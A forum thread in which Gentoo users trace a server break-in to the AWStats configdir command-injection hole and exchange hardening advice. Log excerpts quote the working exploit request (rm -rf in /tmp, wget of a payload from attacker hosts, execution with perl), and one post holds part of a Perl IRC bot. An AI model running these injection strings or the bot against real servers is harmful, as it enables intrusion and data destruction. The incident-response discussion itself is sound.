# hacked by shellbot [via awstats 6.3-r2][solved]

## newtonian

Hi-

One of my machines was compromised by the shellbot worm.  I don't have phpbb installed but I do have php running with apache2.  I saw that a perl script running spanned by apache was eating up all of my CPU.  I tried killing the process, it had been running for 13 hours.  I wasn't able to kill it, so I thought something was strange.  I grepped for "apache" in the temp directory and found this file sess_3539283e27d73cae29fe2b80f9293f60.  I vimmed the file and found the text shellbot in it.  I googled shellbot and found that it goes after php and phpbb vulnerabilities.  Since I don't have phpbb, I reasoned that php was the problem.

I thought about what I could have done to compromise security.  20 hours ago I changed a setting in /etc/apache2/conf/php.ini.   I changed allow_url_fopen = Off to on 

```

Whether to allow the treatment of URLs (like http:// or ftp://) as files.

; allow_url_fopen = On

; Closed for security - <robbat2@gentoo.org>

#allow_url_fopen = Off

allow_url_fopen = Off

```

7 hours later the worm got in.  : (    

I commented out the worm code and changed the allow_url_fopen to off and rebooted the machine.  Everything seems to be running fine but I know I have to reformat the hard disk and start over again.  I've got a lot of web sites and mail accounts on this machine so it's going to be a major pain in the butt.  But that's the way it goes.  Live and learn.  : (

Below is a snippet of the worm.

```

#hellBOT - FBI TEAM Corporation

##

##  ShellBOT - FBI TEAM Corporation

##

##   0ldW0lf - effbeeye81@aol.com

##           - www.security.cnc.net

##

##

##

################# CONFIGURACAO #################################################################

#my $processo = '/usr/local/apache/bin/httpd -DSSL';                   # Nome do processo que vai aparece no ps     #

##----------------------------------------------################################################

#my $linas_max='8';                             # Evita o flood :) depois de X linhas         #

##----------------------------------------------################################################

#my $sleep='4';                                 # ele dorme X segundos                         #

###################### IRC #####################################################################

#my @adms=("zamel00","buju");                          # Nick do administrador

##

##----------------------------------------------################################################

#my @canais=("#vvvvv 214112");                         # Caso haja senha ("#canal :senha")            #

##----------------------------------------------################################################

#my $nick='fbigov';                            # Nick do bot. Caso esteja em uso vai aparecer #

#                                               # aparecer com numero radonamico no final      #

##----------------------------------------------################################################

#my $ircname = 'fbigov';                     # User ID

##

##----------------------------------------------################################################

#chop (my $realname = `uname -a`);              # Full Name                                    #

##----------------------------------------------################################################

#$servidor='61.77.30.70' unless $servidor;  # Servidor de irc que vai ser usado            #

#                                               # caso não seja especificado no argumento      #

##----------------------------------------------################################################

#my $porta='6667';                             # Porta do servidor de irc                     #

################# ACESSO A SHELL ###############################################################

#my $secv = 1;                                 # 1/0 pra habilita/desabilita acesso a shell   #

################################################################################################

#

#my $VERSAO = '0.2';

#

#$SIG{'INT'} = 'IGNORE';

#$SIG{'HUP'} = 'IGNORE';

#$SIG{'TERM'} = 'IGNORE';

#$SIG{'CHLD'} = 'IGNORE';

#$SIG{'PS'} = 'IGNORE';

#

#use IO::Socket;

#use Socket;

#use IO::Select;

#chdir("/");

#$servidor="$ARGV[0]" if $ARGV[0];

#$0="$processo"."\0"x16;;

#my $pid=fork;

#exit if $pid;

#die "Problema com o fork: $!" unless defined($pid);

#

#

#

#my $dcc_sel = new IO::Select->new();

#

##############################

##  B0tchZ na veia ehehe :P  #

##############################

#

#$sel_cliente = IO::Select->new();

#sub sendraw {

#  if ($#_ == '1') {

#    my $socket = $_[0];

#    print $socket "$_[1]\n";

#  } else {

#      print $IRC_cur_socket "$_[0]\n";

#  }

#}

#

#

#sub conectar {

#   my $meunick = $_[0];

#   my $servidor_con = $_[1];

#   my $porta_con = $_[2];

#

#   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);

#   if (defined($IRC_socket)) {

#     $IRC_cur_socket = $IRC_socket;

#

#     $IRC_socket->autoflush(1);

#     $sel_cliente->add($IRC_socket);

#

#     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";

#     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";

#     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;

#     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;

#     nick("$meunick");

#     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");

#     sleep 1;

#   }

#

#}

#my $line_temp;

#while( 1 ) {

#   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }

#   delete($irc_servers{''}) if (defined($irc_servers{''}));

#   &DCC::connections;

#   my @ready = $sel_cliente->can_read(0);

#   next unless(@ready);

#   foreach $fh (@ready) {

#     $IRC_cur_socket = $fh;

#     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};

#     $nread = sysread($fh, $msg, 4096);

#     if ($nread == 0) {

#        $sel_cliente->remove($fh);

snipped the remaining 90%....

```

If anybody knows exactly what allowed this worm to get through please let me know, so I can guard against it in the future.  I'm guessing that the file write setting I discussed above was the problem but I'm not sure.

Cheers,Last edited by newtonian on Sun May 25, 2008 4:53 am; edited 3 times in total

----------

## yaneurabeya

Hmmm... what version of php are you using?

----------

## MrUlterior

There is likely another rootkit somewhere on your system, run chkrootkit and/or use portage to check what files have changed.

The shellbot looks like an irc bot, would you be willing to post a url to the full script or email it to me? I'd be interested in having a look at it.

----------

## yaneurabeya

It is an IRC bot (at least from what's shown). Do you have an IRC server or use IRC?

----------

## Prompty

who writes a bot in perl ?

this script looks pretty non-blackhat 

this looks like something copied from the web. (what language is that portugese ?)

I'd like a copy too if you don't mind . and the version of software you're (were) running .

----------

## newtonian

 *yaneurabeya wrote:*   

> Hmmm... what version of php are you using?

 

Here are the apache related programs I have installed and there versions before I got hit:

 *Quote:*   

> 
> 
> emerge search php
> 
> *  dev-php/php
> ...

 

I only have ports 25(smtp), 993(pop3ssl) 995(imapSSL) 443(SSL web) and 80(web) exposed to the internet.

----------

## newtonian

 *MrUlterior wrote:*   

> There is likely another rootkit somewhere on your system, run chkrootkit and/or use portage to check what files have changed.
> 
> 

 

check rootkit seems to have come up ok.  Here's the output:

 *Quote:*   

> 
> 
> hawk tmp # chkrootkit
> 
> ROOTDIR is `/'
> ...

 

----------

## newtonian

 *MrUlterior wrote:*   

>  use portage to check what files have changed.
> 
> 

 

I'd like to.  I searched the forum, man and google for "portage change file hack"

but can't figure out how to do it properly.  Could you point me to some 

documentation or give me a pointer on how to use portage to check files?

----------

## newtonian

 *yaneurabeya wrote:*   

> It is an IRC bot (at least from what's shown). Do you have an IRC server or use IRC?

 

No, I don't have an IRC server or even use IRC clients.

I'm guessing that it was one of the following because I don't expose anything else(other than mail) to the internet:

vpopmail admin

phpmyadmin

awstats

php

Tomcat

I did an emerge world last month and my settings are pretty much out of the box for all of my installs.  

But I still don't know what the cause is.  Spooky.   :Sad: 

----------

## newtonian

 *Prompty wrote:*   

> who writes a bot in perl ?
> 
> this script looks pretty non-blackhat 
> 
> this looks like something copied from the web. (what language is that portugese ?)
> ...

 

You can get a copy here:

```

www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60

```

and the php version I was/am running:

```

emerge search php

* dev-php/php

Latest version available: 4.3.10

Latest version installed: 4.3.10

```

Last edited by newtonian on Fri Apr 01, 2005 5:11 pm; edited 1 time in total

----------

## rex123

Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false

Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

----------

## MrUlterior

 *rex123 wrote:*   

> Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
> 
> Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

 

His version of aawstats is 6.3-r2, according to your URL the problem was corrected in 6.3 - so I would assume that is not the vulnerability unless you know otherwise ...

I'd still like to see a copy of any shellcode used to propagate the shellbot into the session file

EDIT:

Ah, from http://awstats.sourceforge.net/

 *Quote:*   

> [/list]
> 
> Warning, a security hole was recently found in old AWStats versions (from 5.0 to 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody").
> 
> If you use AWStats with a recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes. 
> ...

 

So that was probably it then.

----------

## MrUlterior

 *newtonian wrote:*   

>  *MrUlterior wrote:*    use portage to check what files have changed.
> 
>  
> 
> I'd like to.  I searched the forum, man and google for "portage change file hack"
> ...

 

Hmmm, I was certain portage did this -- I personally use tripwire. However it seems

that qpkg might to this for you with either of the following options:

```

-cm, --check-md5

-mc, --md5-check - Verify package files md5 

```

Check the man page @ http://gentoo-wiki.com/MAN_qpkg

emerge qpkg

or 

emerge gentoolkit

(don't remember which it is)

to install.

----------

## rex123

Apologies for an old link. I've seen awstats advisories in the past month on bugtraq, and I googled for what looked like a good description of the problem. Thanks for finding the more up to date info.

----------

## newtonian

 *Quote:*   

> 
> 
> Warning, a security hole was recently found in old AWStats versions (from 5.0 to 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody").
> 
> If you use AWStats with a recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes. 
> ...

 

 *Quote:*   

> So that was probably it then.

 

I estimated that I got hit at about noon on Mar 31st so I vimmed the apache2 access_log and did a search for perl.    

Here's what I found about an hour before noon.

 *Quote:*   

> 
> 
> 192.168.1.10 - - [31/Mar/2005:10:38:38 +0900] "GET /config/default.css HTTP/1.1" 404 363 "http://hakodatecgi.com/calendar/getMyCalendar.do?id=4&increment=-1&currentMonth=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050221 Firefox/1.0"
> 
> 211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
> ...

 

The calendar stuff was me debugging a web app for a customer.

----------

## newtonian

 *MrUlterior wrote:*   

> 
> 
> I'd still like to see a copy of any shellcode used to propagate the shellbot into the session file
> 
> 

 

```

211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"

```

putting the above request into a url decoder gave me:

```

Decoded Results: 211.105.221.84 - - [31/Mar/2005:10:40:21 0900] "GET 

/awstats/awstats.pl?configdir=|echo ;

cd /tmp;

rm -rf *;

killall -9 perl;

wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;

perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;

echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

```

----------

## newtonian

 *rex123 wrote:*   

> Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
> 
> Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

 

Ok, here's what I've done so far:

```

emerge unmerge awstats

chkrootkit

mv /tmp/sess_3539283e27d73cae29fe2b80f9293f60 ./

chmod 400 sess_3539283e27d73cae29fe2b80f9293f60

vim /etc/apache2/conf/php.ini. allow_url_fopen = on --> Off 

```

What else do you recommend I do to secure php?

Cheers,

----------

## yaneurabeya

It sounds like the issue wasn't just securing php, but updating your programs. Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). I think I remember something in glsa-security about awstats as well as something on Google about it too a couple of weeks ago.

----------

## newtonian

 *yaneurabeya wrote:*   

> It sounds like the issue wasn't just securing php, but updating your programs. Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). I think I remember something in glsa-security about awstats as well as something on Google about it too a couple of weeks ago.

 

Thanks for the tip.  I didn't know about glsa-check so I googled for it.  

http://www.gentoo.org/doc/en/gentoo-security.xml

devotes a couple lines about glsa at the bottom of the page.

I did:

```
glsa-check --list

```

and updated all of the risks on my system.  glsa-check is great.

It's too bad that it doesn't work correctly with the current version of awstats:

 *Quote:*   

> 
> 
>  glsa-check --list | grep awstats
> 
> 200501-36 [U] AWStats: Remote code execution ( net-www/awstats )
> ...

 

glsa-check says that my system is unaffected by the remote code execution hack.  

But if that were true I wouldn't have had somebody's shellbot eating up 98% of my CPU.

I think anybody running(as CGI) the latest version of awstats 

in portage(awstats 6.3-r2)  is vulnerable.  : (

----------

## newtonian

 *yaneurabeya wrote:*   

> Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). 

 

Thanks again for the advice.

I use vixie cron so I typed crontab -e and added the following lines.

```

15    5      *      *       *              /usr/bin/emerge --sync

55    5      *      *       *              /usr/bin/glsa-check -l | grep -e '\[N\]'

```

With this cron sends me a  daily list of all the files that need updating.

----------

## newtonian

Here's somebody else who got hit with the same thing at about the same time.

https://forums.gentoo.org/viewtopic-t-316275-start-0-postdays-0-postorder-asc-highlight-apache.html

It's got some good advice listed on what do to secure your system as well.

Cheers,

----------

## revertex

 *Prompty wrote:*   

> who writes a bot in perl ?
> 
> this script looks pretty non-blackhat 
> 
> this looks like something copied from the web. (what language is that portugese ?)
> ...

 

yes the comments are in portuguese, look's like brazilian portuguese.

if someone is interest i can translate the comments.

----------

## rex123

 *newtonian wrote:*   

> 
> 
> What else do you recommend I do to secure php?
> 
> 

 

This has been said before on other threads, but here's a summary:

Make sure that a php script - any php script - can't execute anything that you don't mean it to. Mostly this means not allowing php to execute anything in a world-writable directory, eg /tmp or /var/tmp.

There is a lot of information on this on the web, so have a look. Start here: http://www.php.net/manual/en/security.php

----------

## newtonian

Thanks for all the help.

I checked out php site you refered to and it had a lot of good tips.

I think the reason they got into my system was because I was running a vulnerble version of awstats (6.3-r2 ) 

AND one of my vhosts did not have stats authentication running.

I tried hacking myself with the code below and I get the login dialog.  So I think 

this will stop me from being hacked the same way as before.  

Will adding authentication stop this kind of attack and make awstats safe to use again?

```

mydomain.com/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;

wget%20www.yahoo.com/sess_testHack;

echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
```

----------

## rex123

 *newtonian wrote:*   

> 
> 
> Will adding authentication stop this kind of attack and make awstats safe to use again?
> 
> 

 

Authentication will prevent anonymous users from being able to access at all. If they can't access, they can't exploit stuff.

But if you have anything still available to the world without authentication, it could be vulnerable. If it's php code, and it's not something you wrote (eg phpbb, phpnuke, awstats, phpmyadmin, etc etc) then you can be sure there are plenty of people looking for exploits.

So you should do your best in general to make php secure, by turning on safe_mode etc etc, as per all the security info.

----------

## kaidon

 *newtonian wrote:*   

> 
> 
> ```
> 
> 211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www \
> ...

 

What I also find a good idea on a server is to mount your /tmp directory like:

```

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

# or:

#/dev/hdaX    /tmp    tmpfs    nodev,nosuid,noexec    0 0

# if you're short on ram

```

which would have prevented the perl script from being executed.

cheers

k

mod edit: inserted \ linebreak for formatting --Earthwings

----------

## newtonian

 *kaidon wrote:*   

> 
> 
> What I also find a good idea on a server is to mount your /tmp directory like:
> 
> ```
> ...

 

Thanks for the advise, I'll add the line above to my /etc/fstab when access slows down and do a reboot.

I'm assuming that adding the above line won't have any affect on qmail,vpopmail, qmail-scanner or apache.

If not I'm sure I'll find out soon enough.

Cheers,

----------

## newtonian

Here's my current fstab:

```

# <fs>                  <mountpoint>    <type>          <opts> <dump/pass>

/dev/sda1               /boot           ext2            noauto,noatime 1 1

/dev/sda3               /               ext3            noatime 0 0

/dev/sda2               none            swap            sw 0 0

/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro 0 0

```

I've got partitions for boot, root and swap but nothing for tmp.

Do I need to re-partition my hard disk?  or can I just add something to fstab to get it to work.

 *Quote:*   

> 
> 
> tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
> 
> 

 

Cheers,

----------

## kaidon

If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.

In this case you don't need to alter any partition tables.

Depending on what apps you're running it'll also be quite a speed up.

You may want to set the maximum size used for the tmpfs. It will only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up to much ram.

Personally I like to have multiple partitions on a server.

Here's one of my /etc/fstab's as an example:

```

/dev/hda1     /boot          ext2             noauto,noatime                       1 2

/dev/hda2     none           swap            sw                                        0 0

/dev/hda3     /                 reiserfs        noatime,notail                        0 1

/dev/hda5     /var            reiserfs        noatime,notail,nodev,nosuid    0 0

/dev/hda6     /usr            reiserfs        noatime,notail,nodev,ro           0 0

/dev/hda7     /home         reiserfs        noatime,notail,nodev,nosuid    0 0

/dev/hda8     /mnt/build   reiserfs        noauto,noatime,notail,nodev,nosuid 0 0

/dev/hda9     /opt            reiserfs        noatime,notail,nodev,rw          0 0

/dev/hda10   /cvs            reiserfs        noatime,notail,nodev,nosuid    0 0

#

none            /proc           proc            defaults                                 0 0

none            /dev/shm     tmpfs          defaults                                 0 0

tmpfs           /tmp            tmpfs          nodev,nosuid,noexec              0 0

# run amavisd-new temp directory on tmpfs

tmpfs /var/amavis/tmp tmpfs   defaults,nodev,nosuid,noexec,mode=700,uid=102,gid=2003  0 0

```

A recomended reading giving the above tips plus meny more is 

http://www.gentoo.org/doc/en/gentoo-security.xml

hth

cheers

Steven

----------

## newtonian

 *kaidon wrote:*   

> If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
> 
> In this case you don't need to alter any partition tables.
> 
> Depending on what apps you're running it'll also be quite a speed up.
> ...

 

My server access slowed down so I added the single line you suggested and rebooted:

```

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

```

now my fstab looks like this:

```

# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>

# NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.

/dev/sda1               /boot           ext2            noauto,noatime          1 1

/dev/sda3               /               ext3            noatime                 0 0

/dev/sda2               none            swap            sw                      0 0

/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

none                    /proc           proc            defaults                0 0

none                    /dev/shm        tmpfs           defaults                0 0

```

I tested to see if I could run executables from the tmp directory.

```

hawk tmp # cd /tmp

hawk tmp # cat david.hack

#/bin/sh

echo 'I am runnable'

hawk tmp # ls -l david.hack

-rwxrwxr-x  1 root root 30 Apr 14 02:34 david.hack

hawk tmp # whoami

root

hawk tmp # ./david.hack

-bash: ./david.hack: Permission denied

```

I couldn't  :Very Happy: 

I made sure mail and apache were working ok and everything tested out fine.  

I'm all set. Thanks for the useful advise!

----------

## Koon

awstats 6.3-r2 includes 6.4-based patches that fix the configdir problem :

```

if ($QueryString =~ /configdir=([^&]+)/i)

   { $DirConfig=&Sanitize(&DecodeEncodedString("$1")); }

```

with:

```

sub Sanitize {

        my $stringtoclean=shift;

        my $full=shift||0;

        if ($full) {

            $stringtoclean =~ s/[^\w]//g;

    } else {

            $stringtoclean =~ s/[^\w\-\\\/\.:\s]//g;

        }

        return $stringtoclean;

}

```

So the "|echo ;cd /tmp;wget www.hacker.com/badscript;echo ;echo|" would get stripped of the | and ; and therefore be harmless.

My guess is that the awstats.pl in your cgi-bin wasn't an updated version. Awstats is a webapp-config enabled package, so it requires you to deploy it after installation on your virtual hosts (using webapp-config). If you don't, you may have lying around an old vulnerable awstats.pl in cgi-bin...

-K

----------

## linux_girl

holly crap me too :

```

zcat /var/log/apache2/access_log.1.gz |grep awstats.pl|grep configdir

 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET

//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389 "-"

"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET

//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389  

 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET

//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET

//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  

 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET

//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET

//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377  

 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET

//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET

//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  

 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET

//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.

138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502 "-"

"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET 

//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.

138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502

 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET 

/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET

/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510

 

 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 

/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 

/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.

53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787

 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET 

/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET

/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506  

 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 

/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://

80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 

787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 

/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://

80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200

787

 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 

/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508

"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 

/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.

220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508

 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 

/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 

/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516

 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 

/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 

/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:

//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

302 516

```

1)The exploit is no more aviable. juste wodering what it have done on my srver

2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

mod edit: inserted line breaks in code block for page formatting --Earthwings

----------

## newtonian

 *linux_girl wrote:*   

> holly crap me too :
> 
> 1)The exploit is no more aviable. juste wodering what it have done on my srver
> 
> 2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

 

1)Did you have an IRC server running on your system?  If you did the attackers may have been able to do more harm.

You should check for a root kit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp.  You can find directions for both in this post.

2)  I don't know about the script that attacked your system, but it is very easy to have a script attack random ip addresses.

That or maybe it was a previous or current user of your system.  Or maybe there was a short period when you awstats setup was exposed and some web bot added your address and awstats link into a search engine.

Cheers,

----------

## abaelinor

aaLast edited by abaelinor on Mon Oct 20, 2008 8:55 pm; edited 1 time in total

----------

## linux_girl

 *newtonian wrote:*   

>  *linux_girl wrote:*   holly crap me too :
> 
> 1)The exploit is no more aviable. juste wodering what it have done on my srver
> 
> 2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine ! 
> ...

 

 ANALYSIS of the breakin

WIRED files owed by apache

the folowing files was all created by apache and doesnt match any 

GETactivite in /var/log/apache/access

i remeber of cleaning /tmp/ times to times => removing hacker files DAM IT  :Sad: 

```

find / -group 81 -exec ls -gl '{}' \;

-rw-------  1 apache apache 2,1K sep 24 21:43 /tmp/sess_0569b807f3b1ee0f443ac4f703090435

-rw-------  1 apache apache   28 sep 20 21:53 /tmp/sess_0cf9d59765d44c71595229508aa4ad4c

-rw-------  1 apache apache    0 sep 21 21:21 /tmp/sess_2772093e5a5336a86386a86374cc0d24

-rw-------  1 apache apache  16K sep 27 10:32 /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402

-rw-------  1 apache apache    7 sep 11 11:41 /tmp/sess_62717f9c3a213dba20a89d94c84af0cf

-rw-------  1 apache apache 2,0K sep 14 04:24 /tmp/sess_8906480466f77adf635dea22987e2169

-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_9995800ef00b8bb382ccfd3f0a72ff1c

-rw-------  1 apache apache 2,0K sep 19 19:04 /tmp/sess_bc5702670760d3014810079849809a56

-rw-------  1 apache apache    7 sep 25 19:26 /tmp/sess_bd4ec9e8c0d1c943e4ffbcbf5b2c63ce

-rw-------  1 apache apache    7 oct  1 18:13 /tmp/sess_c3f7c383478793804b15d272cd21834f

-rw-------  1 apache apache 2,0K sep 18 02:23 /tmp/sess_d486648c6a3f8dc0b9fa7612002c42ea

-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_d6e3c88f8754240d4010bc8e7672a60d

-rw-------  1 apache apache    7 oct  1 17:05 /tmp/sess_d7d34a92d14fbf09af900f97fe6e761c

